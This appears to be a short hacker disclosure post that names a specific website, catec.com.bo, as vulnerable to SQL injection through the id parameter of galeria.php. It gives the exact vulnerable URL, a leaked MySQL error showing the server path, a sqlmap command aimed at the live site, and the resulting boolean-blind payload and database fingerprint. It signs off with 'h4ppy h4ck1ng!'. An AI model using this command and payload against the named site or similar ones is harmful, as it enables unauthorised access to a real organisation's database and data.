--==[ Discovered by ROMVLVS ]==--
Website: www.catec.com.bo
Vulnerability: SQL Injection (Method GET)
Vulnerable Path: https://www.catec.com.bo/galeria.php?id=2%27
ERROR: Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home2/cateccom/public_html/galeria.php on line 50
Using sqlmap: sqlmap --url https://www.catec.com.bo/galeria.php?id=2
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2' AND 1247=1247 AND 'rgkL'='rgkL
---
[xx:xx:xx] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
--==[ h4ppy h4ck1ng! ]==--